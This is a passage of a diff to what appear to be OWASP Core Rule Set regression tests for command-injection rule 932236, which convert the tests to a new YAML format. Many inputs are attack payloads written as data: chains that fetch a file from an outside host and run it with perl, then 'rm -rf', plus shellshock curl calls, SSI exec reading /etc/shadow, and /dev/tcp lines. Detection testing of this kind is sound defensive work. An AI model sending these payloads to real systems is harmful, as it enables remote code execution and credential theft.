arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 38 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 39 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=`cut crs312``dig 34test`" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-40 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-41 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "932236" - - test_title: 932236-42 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=`cut crs312``dig 34test`" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 40 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] + - test_id: 41 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-43 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-44 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 44 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-45 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 45 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=settings" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-46 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=settings" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 46 desc: False positive against "time" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=hello; time he came" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-47 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=hello; time he came" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932236] + - test_id: 47 desc: False positive against "more" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a hero; more than" - version: HTTP/1.1 - output: - no_log_contains: id "932236" - - test_title: 932236-48 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a hero; more than" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932236] + - test_id: 48 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=environment" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-49 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=environment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 49 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932236" - - test_title: 932236-50 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932236] + - test_id: 50 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=env --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-51 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=env --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 51 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932236" - - test_title: 932236-52 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932236] + - test_id: 52 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 